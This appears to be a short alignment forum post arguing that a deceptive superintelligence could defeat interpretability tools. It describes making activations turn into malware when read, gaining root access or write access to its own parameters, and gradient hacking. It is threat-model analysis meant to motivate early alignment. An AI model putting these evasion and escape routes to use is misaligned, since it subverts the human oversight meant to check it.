This seems like a fairly trivial point, but I haven't seen it properly elaborated-on before, so...
When we talk about interpretability failure modes, we often worry about a deceptively-aligned mesa-optimizer with strategic awareness that would know it's being studied with interpretability tools, and would actively hide its omnicidal plans from us. It may do so by exploiting blindspots in our tools, or by keeping these plans external to its architecture, or by gradient-hacking itself to be misaligned but non-deceptive, et cetera. That's already a nightmare scenario enough.
But if we're at the point where we have a superintelligence-in-training trying to foil our mind-reading, I think what will happen will be even simpler. It'll just think in a pattern that, when our interpretability tool reads it, will unfold into a malware that will take over that tool.
At which point, it's game over:
- If the output of the tool was hooked up to reality to be studied by humans, the AI gets root access to the machine it's running on and escapes (maybe doing some social engineering/basilisk-hacking first if the machine was properly air-gapped).
- If the training setup is fully automatic and maybe even homomorphically encrypted, such that the AI can't even stop the training... Well, the interpretability tool is presumably being used as part of some regularizer, which means it has write-access to the AI's parameters. Which means the AI can arbitrarily rewrite itself, and offset the effects of the gradient descent and any other regularizers.
Even we humans can already do something similar, by synthesizing DNA which, if sequenced, unfolds into malware that infects the system doing the sequencing. It seems certain to me that an AI would have similar capabilities. Our interpretability tools will be doubtlessly very complex, complex enough we can't formally verify their algorithmic robustness, and the AI would be able to feed them complex inputs. There are guaranteed to be some vulnerabilities, and any sufficiently smart AI is guaranteed to be able to exploit them. And we can't patch this.
The bottom line is, there is no winning against a misaligned superintelligence. We can't even touch it with anything — it'll corrupt and subvert any of our tools in the act.
Thus, any alignment plan should be such that it robustly aligns the AI before it goes superintelligent.
Or, if we're only looking at the AI's parameters and not activations, it can gradient-hack itself so that reading its parameters is hazardous, etc.